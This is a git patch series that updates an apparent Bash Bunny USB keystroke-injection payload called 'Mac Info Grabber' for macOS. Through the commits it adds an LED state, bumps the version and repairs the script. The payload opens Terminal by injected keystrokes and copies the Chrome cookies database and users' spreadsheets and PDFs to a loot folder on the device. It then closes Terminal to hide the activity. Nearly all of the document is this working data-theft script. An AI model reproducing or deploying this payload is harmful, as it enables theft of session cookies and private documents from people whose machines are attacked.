From f65e5ef2f209e12c6c4e9aab04d2b09a779a9305 Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Mon, 13 Mar 2017 14:31:47 -0400
Subject: [PATCH 1/3] red means failure; add amber light
---
 payloads/library/macinfograbber/payload.txt | 3 ++-
 payloads/library/macinfograbber/readme.md | 3 ++-
 2 files changed, 4 insertions(+), 2 deletions(-)
diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index cf4461b..932e4ca 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -7,12 +7,13 @@
 # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
 # then stashes them in /root/udisk/loot/MacLoot
 #
+# Amber..............Executing payload
 # Red................Failed to get spreadsheets
 # Purple.............Got some spreadsheets
 # Green..............Finished
 #
-LED R
+LED G R
 ATTACKMODE HID STORAGE
 LOOTDIR=/root/udisk/loot/MacLoot
 mkdir -p $LOOTDIR
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
index 2222832..4dda478 100644
--- a/payloads/library/macinfograbber/readme.md
+++ b/payloads/library/macinfograbber/readme.md
@@ -15,6 +15,7 @@ This payload can be easily modified to grab other files like word docs or csv fi
 | LED | Status |
 | ------------------ | -------------------------------------------- |
+| Amber | Executin Payload |
 | Green | Attack Finished |
 | Purple | Successfully grabbed xls or xlsx files |
-| RED | Did not get any xls or xlsx files |
+| Red | Did not get any xls or xlsx files |
From 889723f455c8fb571f3687b9d1551efc4d5a5fe5 Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Mon, 13 Mar 2017 14:32:33 -0400
Subject: [PATCH 2/3] version bump
---
 payloads/library/macinfograbber/payload.txt | 2 +-
 payloads/library/macinfograbber/readme.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index 932e4ca..3d31b2b 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title: Mac Info Grabber
 # Author: kmakblob
-# Version: 1.1
+# Version: 1.2
 #
 # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
 # then stashes them in /root/udisk/loot/MacLoot
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
index 4dda478..8b9479a 100644
--- a/payloads/library/macinfograbber/readme.md
+++ b/payloads/library/macinfograbber/readme.md
@@ -1,7 +1,7 @@
 # Mac Info Grabber for the BashBunny
 * Author: kmakblob
-* Version: Version 1.0
+* Version: Version 1.2
 * Target: OSX
 ## Description
From 0fd8973e123057db0cd4c374c3b58dc1d2a20a26 Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Mon, 13 Mar 2017 14:33:31 -0400
Subject: [PATCH 3/3] fixes broken code
- fixes lootdir path
- dont capitalize var names that aren't exported
- indentation
- escape shell characters that are passed to QUACK
- account for variable copy times by joining cp and exit commands
- sync the disk
---
 payloads/library/macinfograbber/payload.txt | 38 +++++++++++----------
 1 file changed, 20 insertions(+), 18 deletions(-)
diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index 3d31b2b..1ab7868 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -15,36 +15,38 @@
 LED G R
 ATTACKMODE HID STORAGE
-LOOTDIR=/root/udisk/loot/MacLoot
-mkdir -p $LOOTDIR
+
+lootdir=loot/MacLoot
+mkdir -p /root/udisk/$lootdir
+
 QUACK GUI SPACE
 QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
-QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx
+QUACK DELAY 5000
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
+QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \>
+/Volumes/BashBunny/$lootdir/chromecookies.db
 QUACK ENTER
 QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/
-QUACK ENTER
-QUACK DELAY 1000
-QUACK GUI q
-QUACK DELAY 500
+QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
 QUACK ENTER
+# Sync filesystem
+sync
+
 # Green LED for finished
 LED G
-files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
-if [ "$files" != "0" -o "$files2" != "0"]
-then
-# Got spreadsheet files
-LED R B
+files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l)
+
+if [ "$files" != "0" -o "$files2" != "0"]; then
+ # Got spreadsheet files
+ LED R B
 else
-LED R
-# No spread sheets
+ LED R
+ # No spread sheets
 fi